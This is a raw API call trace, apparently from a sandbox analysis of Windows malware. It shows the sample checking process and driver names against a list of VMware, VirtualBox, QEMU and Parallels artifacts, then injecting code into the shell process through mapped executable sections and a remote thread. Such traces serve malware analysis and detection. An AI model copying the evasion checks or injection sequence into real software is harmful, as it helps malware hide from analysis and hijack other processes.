[0110.435] wcsstr (_Str="attention-capital.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.435] wcsstr (_Str="attention-capital.exe", _SubStr="qga.exe") returned 0x0 [0110.435] wcsstr (_Str="attention-capital.exe", _SubStr="windanr.exe") returned 0x0 [0110.435] wcsstr (_Str="attention-capital.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.435] wcsstr (_Str="attention-capital.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.435] wcsstr (_Str="attention-capital.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.436] wcsstr (_Str="attention-capital.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.436] wcsstr (_Str="glass-nothing-strategy.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.436] wcsstr (_Str="glass-nothing-strategy.exe", _SubStr="qga.exe") returned 0x0 [0110.436] wcsstr (_Str="glass-nothing-strategy.exe", _SubStr="windanr.exe") returned 0x0 [0110.436] wcsstr (_Str="glass-nothing-strategy.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.436] wcsstr (_Str="glass-nothing-strategy.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.436] wcsstr (_Str="glass-nothing-strategy.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.436] wcsstr (_Str="glass-nothing-strategy.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.436] wcsstr (_Str="so light.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.436] wcsstr (_Str="so light.exe", _SubStr="qga.exe") returned 0x0 [0110.436] wcsstr (_Str="so light.exe", _SubStr="windanr.exe") returned 0x0 [0110.436] wcsstr (_Str="so light.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.437] LocalFree (hMem=0x4149b0) returned 0x0 [0110.437] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x0, Length=0x0, ResultLength=0x18ff5c | out: SystemInformation=0x0, ResultLength=0x18ff5c*=0xbed4) returned 0xc0000004 [0110.437] LocalAlloc (uFlags=0x40, uBytes=0xced4) returned 0x4149b0 [0110.437] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x4149b0, Length=0xced4, ResultLength=0x18ff5c | out: SystemInformation=0x4149b0, ResultLength=0x18ff5c*=0xbed4) returned 0x0 [0110.438] strstr (_Str="ntoskrnl.exe", _SubStr="vmci.s") returned 0x0 [0110.439] strstr (_Str="ntoskrnl.exe", _SubStr="vmusbm") returned 0x0 [0110.439] strstr (_Str="ntoskrnl.exe", _SubStr="vmmous") returned 0x0 [0110.439] strstr (_Str="ntoskrnl.exe", _SubStr="vm3dmp") returned 0x0 [0110.439] strstr (_Str="ntoskrnl.exe", _SubStr="vmrawd") returned 0x0 [0110.439] strstr (_Str="ntoskrnl.exe", _SubStr="vmmemc") returned 0x0 [0110.439] strstr (_Str="ntoskrnl.exe", _SubStr="vboxgu") returned 0x0 [0110.439] strstr (_Str="ntoskrnl.exe", _SubStr="vboxsf") returned 0x0 [0110.439] strstr (_Str="ntoskrnl.exe", _SubStr="vboxmo") returned 0x0 [0110.439] strstr (_Str="ntoskrnl.exe", _SubStr="vboxvi") returned 0x0 [0110.439] strstr (_Str="ntoskrnl.exe", _SubStr="vboxdi") returned 0x0 [0110.439] strstr (_Str="ntoskrnl.exe", _SubStr="vioser") returned 0x0 [0110.439] strstr (_Str="hal.dll", _SubStr="vmci.s") returned 0x0 [0110.439] strstr (_Str="hal.dll", _SubStr="vmusbm") returned 0x0 [0110.439] strstr (_Str="hal.dll", _SubStr="vmmous") returned 0x0 [0110.439] strstr (_Str="hal.dll", _SubStr="vm3dmp") returned 0x0 [0110.439] strstr (_Str="hal.dll", _SubStr="vmrawd") returned 0x0 [0110.440] strstr (_Str="hal.dll", _SubStr="vmmemc") returned 0x0 [0110.440] strstr (_Str="hal.dll", _SubStr="vboxgu") returned 0x0 [0110.440] strstr (_Str="hal.dll", _SubStr="vboxsf") returned 0x0 [0110.440] strstr (_Str="hal.dll", _SubStr="vboxmo") returned 0x0 [0110.440] strstr (_Str="hal.dll", _SubStr="vboxvi") returned 0x0 [0110.440] strstr (_Str="hal.dll", _SubStr="vboxdi") returned 0x0 [0110.440] strstr (_Str="hal.dll", _SubStr="vioser") returned 0x0 [0110.440] strstr (_Str="kdcom.dll", _SubStr="vmci.s") returned 0x0 [0110.440] strstr (_Str="kdcom.dll", _SubStr="vmusbm") returned 0x0 [0110.440] strstr (_Str="kdcom.dll", _SubStr="vmmous") returned 0x0 [0110.440] strstr (_Str="kdcom.dll", _SubStr="vm3dmp") returned 0x0 [0110.440] strstr (_Str="kdcom.dll", _SubStr="vmrawd") returned 0x0 [0110.440] strstr (_Str="kdcom.dll", _SubStr="vmmemc") returned 0x0 [0110.440] strstr (_Str="kdcom.dll", _SubStr="vboxgu") returned 0x0 [0110.440] strstr (_Str="kdcom.dll", _SubStr="vboxsf") returned 0x0 [0110.441] strstr (_Str="kdcom.dll", _SubStr="vboxmo") returned 0x0 [0110.441] strstr (_Str="kdcom.dll", _SubStr="vboxvi") returned 0x0 [0110.441] strstr (_Str="kdcom.dll", _SubStr="vboxdi") returned 0x0 [0110.441] strstr (_Str="kdcom.dll", _SubStr="vioser") returned 0x0 [0110.441] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmci.s") returned 0x0 [0110.442] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmusbm") returned 0x0 [0110.442] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmous") returned 0x0 [0110.442] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vm3dmp") returned 0x0 [0110.442] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmrawd") returned 0x0 [0110.442] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmemc") returned 0x0 [0110.442] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxgu") returned 0x0 [0110.442] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxsf") returned 0x0 [0110.442] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxmo") returned 0x0 [0110.442] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxvi") returned 0x0 [0110.442] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxdi") returned 0x0 [0110.442] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vioser") returned 0x0 [0110.442] strstr (_Str="pshed.dll", _SubStr="vmci.s") returned 0x0 [0110.442] strstr (_Str="pshed.dll", _SubStr="vmusbm") returned 0x0 [0110.442] strstr (_Str="pshed.dll", _SubStr="vmmous") returned 0x0 [0110.442] strstr (_Str="pshed.dll", _SubStr="vm3dmp") returned 0x0 [0110.442] strstr (_Str="pshed.dll", _SubStr="vmrawd") returned 0x0 [0110.442] strstr (_Str="pshed.dll", _SubStr="vmmemc") returned 0x0 [0110.442] strstr (_Str="pshed.dll", _SubStr="vboxgu") returned 0x0 [0110.442] strstr (_Str="pshed.dll", _SubStr="vboxsf") returned 0x0 [0110.443] strstr (_Str="pshed.dll", _SubStr="vboxmo") returned 0x0 [0110.443] strstr (_Str="pshed.dll", _SubStr="vboxvi") returned 0x0 [0110.443] strstr (_Str="pshed.dll", _SubStr="vboxdi") returned 0x0 [0110.443] strstr (_Str="pshed.dll", _SubStr="vioser") returned 0x0 [0110.443] strstr (_Str="clfs.sys", _SubStr="vmci.s") returned 0x0 [0110.443] strstr (_Str="clfs.sys", _SubStr="vmusbm") returned 0x0 [0110.443] strstr (_Str="clfs.sys", _SubStr="vmmous") returned 0x0 [0110.443] strstr (_Str="clfs.sys", _SubStr="vm3dmp") returned 0x0 [0110.443] strstr (_Str="clfs.sys", _SubStr="vmrawd") returned 0x0 [0110.443] strstr (_Str="clfs.sys", _SubStr="vmmemc") returned 0x0 [0110.443] strstr (_Str="clfs.sys", _SubStr="vboxgu") returned 0x0 [0110.443] strstr (_Str="clfs.sys", _SubStr="vboxsf") returned 0x0 [0110.443] strstr (_Str="clfs.sys", _SubStr="vboxmo") returned 0x0 [0110.443] strstr (_Str="clfs.sys", _SubStr="vboxvi") returned 0x0 [0110.443] strstr (_Str="clfs.sys", _SubStr="vboxdi") returned 0x0 [0110.443] strstr (_Str="clfs.sys", _SubStr="vioser") returned 0x0 [0110.443] strstr (_Str="ci.dll", _SubStr="vmci.s") returned 0x0 [0110.443] strstr (_Str="ci.dll", _SubStr="vmusbm") returned 0x0 [0110.443] strstr (_Str="ci.dll", _SubStr="vmmous") returned 0x0 [0110.444] strstr (_Str="ci.dll", _SubStr="vm3dmp") returned 0x0 [0110.444] strstr (_Str="ci.dll", _SubStr="vmrawd") returned 0x0 [0110.444] strstr (_Str="ci.dll", _SubStr="vmmemc") returned 0x0 [0110.444] strstr (_Str="ci.dll", _SubStr="vboxgu") returned 0x0 [0110.444] strstr (_Str="ci.dll", _SubStr="vboxsf") returned 0x0 [0110.444] strstr (_Str="ci.dll", _SubStr="vboxmo") returned 0x0 [0110.444] strstr (_Str="ci.dll", _SubStr="vboxvi") returned 0x0 [0110.444] strstr (_Str="ci.dll", _SubStr="vboxdi") returned 0x0 [0110.444] strstr (_Str="ci.dll", _SubStr="vioser") returned 0x0 [0110.444] strstr (_Str="wdf01000.sys", _SubStr="vmci.s") returned 0x0 [0110.444] strstr (_Str="wdf01000.sys", _SubStr="vmusbm") returned 0x0 [0110.444] strstr (_Str="wdf01000.sys", _SubStr="vmmous") returned 0x0 [0110.444] strstr (_Str="wdf01000.sys", _SubStr="vm3dmp") returned 0x0 [0110.444] strstr (_Str="wdf01000.sys", _SubStr="vmrawd") returned 0x0 [0110.444] strstr (_Str="wdf01000.sys", _SubStr="vmmemc") returned 0x0 [0110.444] strstr (_Str="wdf01000.sys", _SubStr="vboxgu") returned 0x0 [0110.444] strstr (_Str="wdf01000.sys", _SubStr="vboxsf") returned 0x0 [0110.444] strstr (_Str="wdf01000.sys", _SubStr="vboxmo") returned 0x0 [0110.444] strstr (_Str="wdf01000.sys", _SubStr="vboxvi") returned 0x0 [0110.445] strstr (_Str="wdf01000.sys", _SubStr="vboxdi") returned 0x0 [0110.445] strstr (_Str="wdf01000.sys", _SubStr="vioser") returned 0x0 [0110.445] strstr (_Str="wdfldr.sys", _SubStr="vmci.s") returned 0x0 [0110.445] strstr (_Str="wdfldr.sys", _SubStr="vmusbm") returned 0x0 [0110.445] strstr (_Str="wdfldr.sys", _SubStr="vmmous") returned 0x0 [0110.445] strstr (_Str="wdfldr.sys", _SubStr="vm3dmp") returned 0x0 [0110.445] strstr (_Str="wdfldr.sys", _SubStr="vmrawd") returned 0x0 [0110.445] strstr (_Str="wdfldr.sys", _SubStr="vmmemc") returned 0x0 [0110.445] strstr (_Str="wdfldr.sys", _SubStr="vboxgu") returned 0x0 [0110.445] strstr (_Str="wdfldr.sys", _SubStr="vboxsf") returned 0x0 [0110.445] strstr (_Str="wdfldr.sys", _SubStr="vboxmo") returned 0x0 [0110.445] strstr (_Str="wdfldr.sys", _SubStr="vboxvi") returned 0x0 [0110.445] strstr (_Str="wdfldr.sys", _SubStr="vboxdi") returned 0x0 [0110.445] strstr (_Str="wdfldr.sys", _SubStr="vioser") returned 0x0 [0110.445] strstr (_Str="acpi.sys", _SubStr="vmci.s") returned 0x0 [0110.445] strstr (_Str="acpi.sys", _SubStr="vmusbm") returned 0x0 [0110.446] strstr (_Str="acpi.sys", _SubStr="vmmous") returned 0x0 [0110.446] strstr (_Str="acpi.sys", _SubStr="vm3dmp") returned 0x0 [0110.446] strstr (_Str="acpi.sys", _SubStr="vmrawd") returned 0x0 [0110.446] strstr (_Str="acpi.sys", _SubStr="vmmemc") returned 0x0 [0110.446] strstr (_Str="acpi.sys", _SubStr="vboxgu") returned 0x0 [0110.446] strstr (_Str="acpi.sys", _SubStr="vboxsf") returned 0x0 [0110.446] strstr (_Str="acpi.sys", _SubStr="vboxmo") returned 0x0 [0110.446] strstr (_Str="acpi.sys", _SubStr="vboxvi") returned 0x0 [0110.446] strstr (_Str="acpi.sys", _SubStr="vboxdi") returned 0x0 [0110.446] strstr (_Str="acpi.sys", _SubStr="vioser") returned 0x0 [0110.446] strstr (_Str="wmilib.sys", _SubStr="vmci.s") returned 0x0 [0110.446] strstr (_Str="wmilib.sys", _SubStr="vmusbm") returned 0x0 [0110.446] strstr (_Str="wmilib.sys", _SubStr="vmmous") returned 0x0 [0110.446] strstr (_Str="wmilib.sys", _SubStr="vm3dmp") returned 0x0 [0110.446] strstr (_Str="wmilib.sys", _SubStr="vmrawd") returned 0x0 [0110.446] strstr (_Str="wmilib.sys", _SubStr="vmmemc") returned 0x0 [0110.446] strstr (_Str="wmilib.sys", _SubStr="vboxgu") returned 0x0 [0110.446] strstr (_Str="wmilib.sys", _SubStr="vboxsf") returned 0x0 [0110.446] strstr (_Str="wmilib.sys", _SubStr="vboxmo") returned 0x0 [0110.446] strstr (_Str="wmilib.sys", _SubStr="vboxvi") returned 0x0 [0110.446] strstr (_Str="wmilib.sys", _SubStr="vboxdi") returned 0x0 [0110.447] strstr (_Str="wmilib.sys", _SubStr="vioser") returned 0x0 [0110.447] strstr (_Str="msisadrv.sys", _SubStr="vmci.s") returned 0x0 [0110.447] strstr (_Str="msisadrv.sys", _SubStr="vmusbm") returned 0x0 [0110.447] strstr (_Str="msisadrv.sys", _SubStr="vmmous") returned 0x0 [0110.447] strstr (_Str="msisadrv.sys", _SubStr="vm3dmp") returned 0x0 [0110.447] strstr (_Str="msisadrv.sys", _SubStr="vmrawd") returned 0x0 [0110.447] strstr (_Str="msisadrv.sys", _SubStr="vmmemc") returned 0x0 [0110.447] strstr (_Str="msisadrv.sys", _SubStr="vboxgu") returned 0x0 [0110.447] strstr (_Str="msisadrv.sys", _SubStr="vboxsf") returned 0x0 [0110.447] strstr (_Str="msisadrv.sys", _SubStr="vboxmo") returned 0x0 [0110.447] strstr (_Str="msisadrv.sys", _SubStr="vboxvi") returned 0x0 [0110.447] strstr (_Str="msisadrv.sys", _SubStr="vboxdi") returned 0x0 [0110.447] strstr (_Str="msisadrv.sys", _SubStr="vioser") returned 0x0 [0110.447] strstr (_Str="pci.sys", _SubStr="vmci.s") returned 0x0 [0110.447] strstr (_Str="pci.sys", _SubStr="vmusbm") returned 0x0 [0110.447] strstr (_Str="pci.sys", _SubStr="vmmous") returned 0x0 [0110.448] strstr (_Str="pci.sys", _SubStr="vm3dmp") returned 0x0 [0110.448] strstr (_Str="pci.sys", _SubStr="vmrawd") returned 0x0 [0110.448] strstr (_Str="pci.sys", _SubStr="vmmemc") returned 0x0 [0110.448] strstr (_Str="pci.sys", _SubStr="vboxgu") returned 0x0 [0110.448] strstr (_Str="pci.sys", _SubStr="vboxsf") returned 0x0 [0110.448] strstr (_Str="pci.sys", _SubStr="vboxmo") returned 0x0 [0110.448] strstr (_Str="pci.sys", _SubStr="vboxvi") returned 0x0 [0110.448] strstr (_Str="pci.sys", _SubStr="vboxdi") returned 0x0 [0110.448] strstr (_Str="pci.sys", _SubStr="vioser") returned 0x0 [0110.448] strstr (_Str="vdrvroot.sys", _SubStr="vmci.s") returned 0x0 [0110.448] strstr (_Str="vdrvroot.sys", _SubStr="vmusbm") returned 0x0 [0110.448] strstr (_Str="vdrvroot.sys", _SubStr="vmmous") returned 0x0 [0110.448] strstr (_Str="vdrvroot.sys", _SubStr="vm3dmp") returned 0x0 [0110.448] strstr (_Str="vdrvroot.sys", _SubStr="vmrawd") returned 0x0 [0110.448] strstr (_Str="vdrvroot.sys", _SubStr="vmmemc") returned 0x0 [0110.448] strstr (_Str="vdrvroot.sys", _SubStr="vboxgu") returned 0x0 [0110.448] strstr (_Str="vdrvroot.sys", _SubStr="vboxsf") returned 0x0 [0110.448] strstr (_Str="vdrvroot.sys", _SubStr="vboxmo") returned 0x0 [0110.448] strstr (_Str="vdrvroot.sys", _SubStr="vboxvi") returned 0x0 [0110.448] strstr (_Str="vdrvroot.sys", _SubStr="vboxdi") returned 0x0 [0110.449] strstr (_Str="vdrvroot.sys", _SubStr="vioser") returned 0x0 [0110.449] strstr (_Str="partmgr.sys", _SubStr="vmci.s") returned 0x0 [0110.449] strstr (_Str="partmgr.sys", _SubStr="vmusbm") returned 0x0 [0110.449] strstr (_Str="partmgr.sys", _SubStr="vmmous") returned 0x0 [0110.449] strstr (_Str="partmgr.sys", _SubStr="vm3dmp") returned 0x0 [0110.449] strstr (_Str="partmgr.sys", _SubStr="vmrawd") returned 0x0 [0110.449] strstr (_Str="partmgr.sys", _SubStr="vmmemc") returned 0x0 [0110.449] strstr (_Str="partmgr.sys", _SubStr="vboxgu") returned 0x0 [0110.449] strstr (_Str="partmgr.sys", _SubStr="vboxsf") returned 0x0 [0110.449] strstr (_Str="partmgr.sys", _SubStr="vboxmo") returned 0x0 [0110.449] strstr (_Str="partmgr.sys", _SubStr="vboxvi") returned 0x0 [0110.449] strstr (_Str="partmgr.sys", _SubStr="vboxdi") returned 0x0 [0110.449] strstr (_Str="partmgr.sys", _SubStr="vioser") returned 0x0 [0110.450] strstr (_Str="volmgr.sys", _SubStr="vmci.s") returned 0x0 [0110.450] strstr (_Str="volmgr.sys", _SubStr="vmusbm") returned 0x0 [0110.450] strstr (_Str="volmgr.sys", _SubStr="vmmous") returned 0x0 [0110.450] strstr (_Str="volmgr.sys", _SubStr="vm3dmp") returned 0x0 [0110.450] strstr (_Str="volmgr.sys", _SubStr="vmrawd") returned 0x0 [0110.450] strstr (_Str="volmgr.sys", _SubStr="vmmemc") returned 0x0 [0110.450] strstr (_Str="volmgr.sys", _SubStr="vboxgu") returned 0x0 [0110.450] strstr (_Str="volmgr.sys", _SubStr="vboxsf") returned 0x0 [0110.450] strstr (_Str="volmgr.sys", _SubStr="vboxmo") returned 0x0 [0110.450] strstr (_Str="volmgr.sys", _SubStr="vboxvi") returned 0x0 [0110.450] strstr (_Str="volmgr.sys", _SubStr="vboxdi") returned 0x0 [0110.450] strstr (_Str="volmgr.sys", _SubStr="vioser") returned 0x0 [0110.451] strstr (_Str="volmgrx.sys", _SubStr="vmci.s") returned 0x0 [0110.451] strstr (_Str="volmgrx.sys", _SubStr="vmusbm") returned 0x0 [0110.451] strstr (_Str="volmgrx.sys", _SubStr="vmmous") returned 0x0 [0110.451] strstr (_Str="volmgrx.sys", _SubStr="vm3dmp") returned 0x0 [0110.451] strstr (_Str="volmgrx.sys", _SubStr="vmrawd") returned 0x0 [0110.451] strstr (_Str="volmgrx.sys", _SubStr="vmmemc") returned 0x0 [0110.451] strstr (_Str="volmgrx.sys", _SubStr="vboxgu") returned 0x0 [0110.451] strstr (_Str="volmgrx.sys", _SubStr="vboxsf") returned 0x0 [0110.451] strstr (_Str="volmgrx.sys", _SubStr="vboxmo") returned 0x0 [0110.451] strstr (_Str="volmgrx.sys", _SubStr="vboxvi") returned 0x0 [0110.451] strstr (_Str="volmgrx.sys", _SubStr="vboxdi") returned 0x0 [0110.451] strstr (_Str="volmgrx.sys", _SubStr="vioser") returned 0x0 [0110.451] strstr (_Str="mountmgr.sys", _SubStr="vmci.s") returned 0x0 [0110.451] strstr (_Str="mountmgr.sys", _SubStr="vmusbm") returned 0x0 [0110.451] strstr (_Str="mountmgr.sys", _SubStr="vmmous") returned 0x0 [0110.451] strstr (_Str="mountmgr.sys", _SubStr="vm3dmp") returned 0x0 [0110.451] strstr (_Str="mountmgr.sys", _SubStr="vmrawd") returned 0x0 [0110.451] strstr (_Str="mountmgr.sys", _SubStr="vmmemc") returned 0x0 [0110.452] strstr (_Str="mountmgr.sys", _SubStr="vboxgu") returned 0x0 [0110.452] strstr (_Str="mountmgr.sys", _SubStr="vboxsf") returned 0x0 [0110.452] strstr (_Str="mountmgr.sys", _SubStr="vboxmo") returned 0x0 [0110.452] strstr (_Str="mountmgr.sys", _SubStr="vboxvi") returned 0x0 [0110.452] strstr (_Str="mountmgr.sys", _SubStr="vboxdi") returned 0x0 [0110.452] strstr (_Str="mountmgr.sys", _SubStr="vioser") returned 0x0 [0110.452] strstr (_Str="atapi.sys", _SubStr="vmci.s") returned 0x0 [0110.452] strstr (_Str="atapi.sys", _SubStr="vmusbm") returned 0x0 [0110.452] strstr (_Str="atapi.sys", _SubStr="vmmous") returned 0x0 [0110.452] strstr (_Str="atapi.sys", _SubStr="vm3dmp") returned 0x0 [0110.452] strstr (_Str="atapi.sys", _SubStr="vmrawd") returned 0x0 [0110.452] strstr (_Str="atapi.sys", _SubStr="vmmemc") returned 0x0 [0110.452] strstr (_Str="atapi.sys", _SubStr="vboxgu") returned 0x0 [0110.452] strstr (_Str="atapi.sys", _SubStr="vboxsf") returned 0x0 [0110.452] strstr (_Str="atapi.sys", _SubStr="vboxmo") returned 0x0 [0110.452] strstr (_Str="atapi.sys", _SubStr="vboxvi") returned 0x0 [0110.452] strstr (_Str="atapi.sys", _SubStr="vboxdi") returned 0x0 [0110.452] strstr (_Str="atapi.sys", _SubStr="vioser") returned 0x0 [0110.453] strstr (_Str="ataport.sys", _SubStr="vmci.s") returned 0x0 [0110.453] strstr (_Str="ataport.sys", _SubStr="vmusbm") returned 0x0 [0110.453] strstr (_Str="ataport.sys", _SubStr="vmmous") returned 0x0 [0110.453] strstr (_Str="ataport.sys", _SubStr="vm3dmp") returned 0x0 [0110.453] strstr (_Str="ataport.sys", _SubStr="vmrawd") returned 0x0 [0110.453] strstr (_Str="ataport.sys", _SubStr="vmmemc") returned 0x0 [0110.453] strstr (_Str="ataport.sys", _SubStr="vboxgu") returned 0x0 [0110.453] strstr (_Str="ataport.sys", _SubStr="vboxsf") returned 0x0 [0110.453] strstr (_Str="ataport.sys", _SubStr="vboxmo") returned 0x0 [0110.453] strstr (_Str="ataport.sys", _SubStr="vboxvi") returned 0x0 [0110.453] strstr (_Str="ataport.sys", _SubStr="vboxdi") returned 0x0 [0110.453] strstr (_Str="ataport.sys", _SubStr="vioser") returned 0x0 [0110.453] strstr (_Str="msahci.sys", _SubStr="vmci.s") returned 0x0 [0110.453] strstr (_Str="msahci.sys", _SubStr="vmusbm") returned 0x0 [0110.453] strstr (_Str="msahci.sys", _SubStr="vmmous") returned 0x0 [0110.453] strstr (_Str="msahci.sys", _SubStr="vm3dmp") returned 0x0 [0110.453] strstr (_Str="msahci.sys", _SubStr="vmrawd") returned 0x0 [0110.453] strstr (_Str="msahci.sys", _SubStr="vmmemc") returned 0x0 [0110.453] strstr (_Str="msahci.sys", _SubStr="vboxgu") returned 0x0 [0110.454] strstr (_Str="msahci.sys", _SubStr="vboxsf") returned 0x0 [0110.454] strstr (_Str="msahci.sys", _SubStr="vboxmo") returned 0x0 [0110.455] LocalFree (hMem=0x4149b0) returned 0x0 [0110.455] Sleep (dwMilliseconds=0x1388) [0115.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18ff24*=0x0, ZeroBits=0x0, RegionSize=0x18ff2c*=0x5200, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x18ff24*=0x1a0000, RegionSize=0x18ff2c*=0x6000) returned 0x0 [0115.867] GetShellWindow () returned 0x100e6 [0115.867] GetWindowThreadProcessId (in: hWnd=0x100e6, lpdwProcessId=0x18fed0 | out: lpdwProcessId=0x18fed0) returned 0x13c [0115.868] NtOpenProcess (in: ProcessHandle=0x18ff20, DesiredAccess=0x40, ObjectAttributes=0x18ff08*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x18ff00*(UniqueProcess=0x390, UniqueThread=0x0) | out: ProcessHandle=0x18ff20*=0x80) returned 0x0 [0115.868] NtDuplicateObject (in: SourceProcessHandle=0x80, SourceHandle=0xffffffff, TargetProcessHandle=0xffffffff, TargetHandle=0x18ff24, DesiredAccess=0x0, HandleAttributes=0x0, Options=0x2 | out: TargetHandle=0x18ff24*=0x84) returned 0x0 [0115.868] NtCreateSection (in: SectionHandle=0x18fedc, DesiredAccess=0x6, ObjectAttributes=0x0, MaximumSize=0x18fee0, SectionPageProtection=0x4, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x18fedc*=0x88) returned 0x0 [0115.868] NtMapViewOfSection (in: SectionHandle=0x88, ProcessHandle=0xffffffff, BaseAddress=0x18feec*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fef8*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18feec*=0x1b0000, SectionOffset=0x0, ViewSize=0x18fef8*=0x5000) returned 0x0 [0115.868] NtMapViewOfSection (in: SectionHandle=0x88, ProcessHandle=0x84, BaseAddress=0x18fef4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fef8*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18fef4*=0x3950000, SectionOffset=0x0, ViewSize=0x18fef8*=0x5000) returned 0x0 [0115.869] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b0000, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr")) returned 0x2a [0115.869] NtCreateSection (in: SectionHandle=0x18fed8, DesiredAccess=0xe, ObjectAttributes=0x0, MaximumSize=0x18fee0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x18fed8*=0x8c) returned 0x0 [0115.870] NtMapViewOfSection (in: SectionHandle=0x8c, ProcessHandle=0xffffffff, BaseAddress=0x18fee8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fef8*=0x15200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18fee8*=0x1c0000, SectionOffset=0x0, ViewSize=0x18fef8*=0x16000) returned 0x0 [0115.870] NtMapViewOfSection (in: SectionHandle=0x8c, ProcessHandle=0x84, BaseAddress=0x18fef0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fef8*=0x16000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x20 | out: BaseAddress=0x18fef0*=0x3960000, SectionOffset=0x0, ViewSize=0x18fef8*=0x16000) returned 0x0 [0115.871] RtlCreateUserThread (in: ProcessHandle=0x84, SecurityDescriptor=0x0, CreateSuspended=0, StackZeroBits=0x0, StackReserve=0x0, StackCommit=0x0, StartAddress=0x3961930, Parameter=0x3950000, ThreadHandle=0x18fe30*=0x77a16c9a77a16c93, ClientId=0x0 | out: ThreadHandle=0x18fe30*=0x90, ClientId=0x0) returned 0x0 [0116.132] NtTerminateProcess (ProcessHandle=0xffffffff, ExitStatus=0x0)